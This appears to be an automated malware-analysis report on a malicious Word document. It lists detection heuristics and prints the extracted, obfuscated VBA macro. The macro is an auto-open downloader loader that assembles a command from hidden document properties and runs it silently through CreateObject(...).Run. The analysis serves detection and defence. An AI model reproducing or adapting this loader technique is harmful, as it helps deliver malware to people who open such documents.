Verdict: MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-executing loader that uses CreateObject and Shell execution, typical of malware downloaders. The ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0' further confirms its malicious nature as a downloader.
Heuristics (9)

- ClamAV: Doc.Macro.VBSDownloader-6336817-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched lines in script:
  `mNaCbmDx = ZneZkvTk + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX`
  `CreateObject(DEBAKSwY).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0`
  `YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched lines in script: the same three lines as the obfuscated auto-exec VBA loader finding above.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched lines in script:
  `End Function`
  `Sub autoopen()`
  `VKbZcLUg`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6793 bytes |

SHA-256: a74d516e60e730a674036951b7790dc60617b8c6c2efbb724e16fbc72bae699c

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 99 of 138 identifiers look randomly generated (e.g. 'DdUfWKsECzw'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function BFvwAuZaVks()
XAamgnsVVb = 5165
Dim SrGPDtnepsZ(5165)
GHzbxwpn = "vtSrDzbX"
amnKkpVwV = "VWseGNg"
SrGPDtnepsZ(2227) = awzenTtPGY
SrGPDtnepsZ(4272) = WUkcPat
SrGPDtnepsZ(3669) = 7075 + 6231 + 8852 + 5718 / 4558 / 9361 / 1558 - 7755 - 3944 + 3708 + 9243
SrGPDtnepsZ(4564) = 2190 + 1532 + 1910 / 8793 - 9797 + 4889 + 4615
SrGPDtnepsZ(3963) = 2418 + 5027 / 3108 / 7451 - 9786 - 548 - 2611 + 2156 + 5715
SrGPDtnepsZ(4468) = sTrKDrEMD
SrGPDtnepsZ(4882) = hxGDwUsz
SrGPDtnepsZ(4115) = yYWXhtA
SrGPDtnepsZ(4036) = 513
SrGPDtnepsZ(1906) = 4149
SrGPDtnepsZ(4353) = 4888
SrGPDtnepsZ(4520) = 4721
SrGPDtnepsZ(3908) = WnFmeKgcP
SrGPDtnepsZ(79) = uDLZbSACx
SrGPDtnepsZ(4255) = KUeDGrVbCdS
SrGPDtnepsZ(1019) = 6267 + 4071 / 215 / 3455 / 1127 - 6146 - 6217 - 8856 + 6066 + 6423 + 3276
SrGPDtnepsZ(845) = 9362 + 6185 / 6055 - 688 - 7820 - 794 + 1692 + 3520 + 897
SrGPDtnepsZ(1049) = 3086 + 9498 + 5926 + 8841 / 4542 - 6575 - 5633 - 7816 + 7935 + 1215
For XAamgnsVVb = 2759 To 3545
SrGPDtnepsZ(XAamgnsVVb) = XAamgnsVVb
Next
cHyBNGb = SrGPDtnepsZ(926) + SrGPDtnepsZ(3005) + SrGPDtnepsZ(3149) + SrGPDtnepsZ(1498) + SrGPDtnepsZ(5165)
ueCChrd = SrGPDtnepsZ(2748) + SrGPDtnepsZ(83) + SrGPDtnepsZ(4223) + SrGPDtnepsZ(3116) + SrGPDtnepsZ(159) + SrGPDtnepsZ(5165)
End Function
Function NhvPuxvN()
TnrRkfSK = 2872
Dim wYVwYPZF(2872)
KPUdypH = "mNbsMXPAeu"
wYVwYPZF(413) = DAzwxYTPDpn
wYVwYPZF(1629) = CtULWMbR
wYVwYPZF(959) = SXrHAePSKs
wYVwYPZF(1423) = 9521 + 1988 / 4344 / 6200 - 9941 - 5877 - 7876 + 5040 + 6001
wYVwYPZF(2812) = 4990 + 6672 / 6251 / 7159 - 7847 + 6786
wYVwYPZF(1132) = 4988 + 8786 / 7729 / 2597 / 8154 - 653 - 6983 + 9292 + 6301
wYVwYPZF(812) = vAMKygw
wYVwYPZF(1254) = DdUfWKsECzw
wYVwYPZF(1555) = 727
wYVwYPZF(1707) = LXFkhuTZhX
wYVwYPZF(1518) = vdMuzhTfgS
wYVwYPZF(1777) = BVmcmTXF
wYVwYPZF(1682) = XsBSUrH
wYVwYPZF(1908) = 3573 + 8612 + 9318 + 9297 / 9023 / 8782 / 9059 - 6885 - 4062 - 3479 + 2192 + 697
wYVwYPZF(644) = 849 + 8506 + 8665 / 3519 / 1456 / 4453 - 1186 + 632
wYVwYPZF(713) = 6508 + 6703 / 3722 - 1205 - 8884 - 2100 + 4052 + 1127
For TnrRkfSK = 102 To 160
wYVwYPZF(TnrRkfSK) = TnrRkfSK
Next
cvrTLUP = wYVwYPZF(1737) + wYVwYPZF(2715) + wYVwYPZF(996) + wYVwYPZF(479) + wYVwYPZF(2484) + wYVwYPZF(292) + wYVwYPZF(1105) + wYVwYPZF(2872)
YHNcNpTz = wYVwYPZF(701) + wYVwYPZF(749) + wYVwYPZF(2276) + wYVwYPZF(2872)
cFzHxGk = wYVwYPZF(905) + wYVwYPZF(2182) + wYVwYPZF(2382) + wYVwYPZF(2872)
End Function
Sub autoopen()
VKbZcLUg
End Sub
Public Function yKvCXNf(vRKbufsX)
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
KADXEmH = ActiveDocument.CustomDocumentProperties(vRKbufsX)
yKvCXNf = KADXEmH
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
End Function
Public Function VKbZcLUg()
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
DEBAKSwY = yKvCXNf("ankMNxSvDuv") + yKvCXNf("fDaHszez") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("kfShLKvtYaW") + yKvCXNf("drgLHvTZD") + yKvCXNf("RzsFTKsMa")
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
ZneZkvTk = yKvCXNf("PpRDVaYk") + yKvCXNf("SnVfbyV") + yKvCXNf("NBhWRnnr") + yKvCXNf("nGmERhbgD") + yKvCXNf("MHmBmVtxxeD") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("GZnvfVd")
mNaCbmDx = ZneZkvTk + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX
CreateObject(DEBAKSwY).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
End Function
Function mRfpfKhGSD()
mCzGYYaxRLX = 8385
Dim MCGPUwUZMWy(8385)
caMKKbnBu = ("rFNuCnmpUU")
ALKNUwLcpPu = ("SLCZxtuyhF")
MczvCeNBH = ("XLSHkERKtnR")
MCGPUwUZMWy(7904) = UcwcACY
MCGPUwUZMWy(2787) = rbUkPum
MCGPUwUZMWy(684) = 7163 + 811 + 710 / 7663 / 5363 / 1108 - 3395 - 7739 + 4644 + 8393 + 9078
MCGPUwUZMWy(1867) = KwvDMWrrG
MCGPUwUZMWy(1721) = LzkZWpB
MCGPUwUZMWy(7960) = 8725
MCGPUwUZMWy(8262) = 7312
MCGPUwUZMWy(6212) = 8270
MCGPUwUZMWy(298) = ZUpymUKM
MCGPUwUZMWy(3896) = 954 + 9998 / 9266 / 6580 - 736 - 883 + 2313 + 1188 + 5675
For mCzGYYaxRLX = 7999 To 5163
MCGPUwUZMWy(mCzGYYaxRLX) = mCzGYYaxRLX
Next
KAyYxEHgrP = MCGPUwUZMWy(3814) + MCGPUwUZMWy(8385)
ZBXEkbtP = MCGPUwUZMWy(3170) + MCGPUwUZMWy(1765) + MCGPUwUZMWy(8385)
End Function
Function gHXrdcyrg()
WavCCbxD = 8004
Dim EhAUrkkxwMG(8004)
naRAuCU = ("vgaYmNPnVX")
EhAUrkkxwMG(2991) = eNECkccF
EhAUrkkxwMG(6466) = FbcdBnKRuK
EhAUrkkxwMG(3066) = kfEeTmdvHNy
EhAUrkkxwMG(3977) = vLuXaKtP
EhAUrkkxwMG(2869) = 4459 + 146 + 7490 / 9816 - 7410 - 8463 - 2553 + 451 + 8893
EhAUrkkxwMG(5881) = mtpNLGb
EhAUrkkxwMG(5248) = gfxcZDpkv
EhAUrkkxwMG(2458) = SsvSpWe
EhAUrkkxwMG(458) = AVUPYHGfC
EhAUrkkxwMG(4552) = 198
EhAUrkkxwMG(5266) = XvRCbwhh
EhAUrkkxwMG(4843) = eXHbUGY
EhAUrkkxwMG(6934) = dHZNEDyDcv
EhAUrkkxwMG(4138) = MvYmwSeRUT
EhAUrkkxwMG(6033) = 8623 + 2405 / 7340 / 2292 - 2848 - 4607 + 3843 + 888 + 8671
For WavCCbxD = 830 To 4845
EhAUrkkxwMG(WavCCbxD) = WavCCbxD
Next
PHZLUddDVam = EhAUrkkxwMG(7146) + EhAUrkkxwMG(7682) + EhAUrkkxwMG(122) + EhAUrkkxwMG(417) + EhAUrkkxwMG(4616) + EhAUrkkxwMG(1498) + EhAUrkkxwMG(8004)
End Function